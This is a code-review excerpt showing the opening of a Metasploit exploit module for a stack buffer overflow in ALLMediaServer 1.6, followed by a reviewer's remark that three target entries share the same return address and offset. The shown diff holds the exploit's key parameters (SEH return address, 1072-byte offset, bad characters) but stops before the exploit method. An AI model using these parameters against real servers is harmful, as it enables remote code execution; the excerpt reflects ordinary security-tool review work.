modules/exploits/windows/misc/allmedia_1_6_buffer_overflow.rb

```diff
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+# Author: Hejap Zairy
+# Date: 1.08.2022
+# Exploit Prof
+# Proof and Exploit:
+#image:https://i.imgur.com/yLrRR2t.png
+#video:https://streamable.com/x4i50c
+
+
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::Tcp
+    include Msf::Exploit::Seh
+
+    def initialize(info = {})
+        super(update_info(info,
+            'Name'           => 'ALLMediaServer 1.6  Buffer Overflow',
+            'Description'    => %q{
+                This module exploits a stack buffer overflow in ALLMediaServer 1.6
+                The vulnerability is caused due to a boundary error within the
+                handling of HTTP request.
+                Thank you Saud Alenazi and 0xSaudi
+                and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq
+            },
+            'License'        => MSF_LICENSE,
+            'Author'         =>
+                [
+                    'Hejap Zairy Al-Sharif', # Remote exploit and Metasploit module
+                ],
+            'DefaultOptions' =>
+                {
+                    'ExitFunction' => 'process', #none/process/thread/seh
+                },
+            'Platform'       => 'win',
+            'Payload'        =>
+                {
+                    'BadChars' => '\x00\x0a\x0d\xff'
+                },
+
+            'Targets'        =>
+                [
+                    [ 'ALLMediaServer 1.6 / Windows 10  - English',
+                        {
+                            'Ret'       =>   0x0040590B, # POP ESI # POP EBX  # RET
+                            'Offset'    =>   1072
+                        }
+                    ],
+                    [ 'ALLMediaServer 1.6 / Windows XP SP3 - English',
+                        {
+                            'Ret'       =>   0x0040590B, # POP ESI # POP EBX  # RET
+                            'Offset'    =>   1072
+                        }
+                    ],
+                    [ 'ALLMediaServer 1.6 / Windows 7 SP1 - English',
+                        {
+                            'Ret'       =>   0x0040590B, # POP ESI # POP EBX  # RET
+                            'Offset'    =>   1072
+                        }
+                    ],
```

Comment:
These are all the same Ret address and Offset. I don't get why this is needed vs just using one target with the name of the product and the affected version. The point of having multiple target is for when these values change between different versions of a product or between different operating systems however this doesn't seem to be the case for your exploit so I don't think multiple target entries are needed here.